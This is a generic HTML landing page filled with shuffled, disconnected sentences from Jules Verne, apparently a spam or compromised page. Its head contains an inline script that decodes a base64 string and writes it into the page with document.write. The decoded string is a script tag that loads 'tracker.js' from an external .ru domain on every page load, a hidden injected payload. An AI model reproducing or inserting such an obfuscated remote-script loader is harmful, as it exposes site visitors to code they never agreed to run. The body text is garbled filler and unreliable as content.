<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>As to the fish, they always provoked our admiration when we surprised the secrets of th</title>

	<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Quicksand" rel="stylesheet">
    <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.6.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="styles.css">

    <script type="text/javascript">
	let encoded = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8va2xvb2xrLnJ1L3RyYWNrZXIuanMiPjwvc2NyaXB0PjxkaXYgY2xhc3M9ImNoZWNrX2Zvcl92MXVoamlxdGRlNmciPjwvZGl2Pg==';let decoded = atob(encoded);document.write(''+ decoded +'');
	</script>

</head>

<body>

	<header>
		<nav>
			<li><a href="#">Home</a></li>
			<li><a href="#">Products</a></li>
			<li><a href="#">About</a></li>
			<li><a href="#">Contacts</a></li>
		</nav>
	</header>


	<section class="hero">
		<div class="background-image" style="background-image: url(main.jpg);"></div>
		<h1>As to the fish, they always provoked our admiration when we surprised the secrets of th</h1>
	</section>


	<section class="our-work">
		<h3 class="title">In speaking thus, I wished to appear more confident</h3>
		<p>Easily. On the 18th of January, the Nautilus was in 105 longitude and 15 south latitude. The weather was threatening, the sea rough and rolling. There was a strong east wind. The barometer, which had been going down for some days, foreboded a coming storm. I went up on the platform just as the second lieutenant was taking the measure of the horary angles, and waited, according to habit, till the daily phrase was said. But, on this day, it was exchanged for another phrase not less incomprehensible. Almost directly, I saw Captain Nemo appear, with a glass, looking toward the horizon. I stared at the singular person who spoke thus. Was he playing upon my credulity? The future would decide that. The Canadian's last words produced a sudden revolution in my brain. I wriggled myself quickly to the top of the being, or object, half out of the water, which served us for a refuge. I kicked it. It was evidently a hard, impenetrable body, and not the soft substance that forms the bodies of the great marine mammalia. But this hard body might be a bony carapace, like that of the antediluvian animals; and I should be free to class this monster among amphibious reptiles, such as tortoises or alligators.</p>
		<hr>

		<ul class="grid">
			<li class="large" style="background-image: url(image1.jpg);"></li>
		</div>
	</section>
	

	<section class="our-work">
		<h3 class="title">I thanked Captain Nemo, and went up to the</h3>
		<p>Well, M. Aronnax, that is wisely said. Saying which, Captain Nemo unfurled a black banner, bearing an N in gold quartered on its bunting. Then turning toward the orb of day, whose last rays lapped the horizon of the sea, he exclaimed: We are not returning to Paris, then? said Conseil. At that moment we could not think of returning to France. The means of communication between the north of Norway and the south are rare, and I am therefore obliged to wait for the steamboat running monthly from Cape North.</p>
		<hr>

		<ul class="grid">
			<li class="large" style="background-image: url(image2.jpg);"></li>
		</div>
	</section>



	<section class="contact">
		<h3 class="title">His banker's!</h3>	
		<p>Twelve! I exclaimed. Never, sir! he said, hastily interrupting me. There is no alternative, Master Ned. But then, when you wish to embark, you are obliged to come to the surface of the water?</p>
		<hr>

		<form>
			<input type="email" placeholder="Email">
			<input type="Name" placeholder="Name">
			<input type="Surmane" placeholder="Surname">
			<a href="#" class="btn">Subscribe now</a>
		</form>

	</section>

	<footer>
		<ul>
			<li><a href="#"><i class="fa fa-twitter-square"></i></a></li>
			<li><a href="#"><i class="fa fa-facebook-square"></i></a></li>
			<li><a href="#"><i class="fa fa-snapchat-square"></i></a></li>
			<li><a href="#"><i class="fa fa-pinterest-square"></i></a></li>
			<li><a href="#"><i class="fa fa-github-square"></i></a></li>
		</ul>
		<p><a href="policy.html">Privacy policy</a></p>
		<p>333 Charity Pines, Suite 614, 02007-7022, New Aniyah, New Mexico, United States</p>
	</footer>

</body>

</html>
